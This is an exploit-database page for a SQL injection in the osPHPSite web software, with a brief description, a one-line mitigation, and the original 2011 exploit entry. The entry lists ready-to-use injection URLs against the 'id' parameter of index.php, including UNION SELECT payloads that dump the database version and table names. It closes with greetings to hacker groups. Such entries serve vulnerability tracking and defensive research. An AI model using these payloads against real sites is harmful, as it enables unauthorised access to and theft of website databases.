header-logo
Suggest Exploit
vendor:
osPHPSite
by:
vir0e5
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: osPHPSite
Affected Version From: ALL VERSION
Affected Version To: ALL VERSION
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

osPHPSite SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. For example, an attacker can send a malicious SQL query to the vulnerable application as a part of the 'id' parameter value in the following URL: http://www.[sitename].com/index.php?id=[Sql Injection]. This can allow the attacker to access or modify the application's data, or even execute system commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: osPHPSite SQL Injection Vulnerability
# Author  : vir0e5
# Date    : 1-12-2011
# Vendor  : http://www.osphpsite.com
# Software Link: http://sourceforge.net/projects/osphpsite
# Version: ALL VERSION


[ Vulnerable File ]
~ index.php

[ Exploit ]
~ http://www.[sitename].com/index.php?id=[Sql Injection]

[ example ]
~ http://www.[sitename].com/index.php?id=24'
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8-- 
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
~ And More.....



********************************************
[+] Greetings :[ mywisdom - kiddies - kamtiez - r3m1ck - aciz_n1nj4 | mozartklik |syafm0vic- skuteng_boy - blue_screen - agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;

[+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | http://devilzc0de.org | http://santricyber.org | http://indonesiancoder.com | http://cyber4rt.com And OTHER's


Cause i'm Alone!!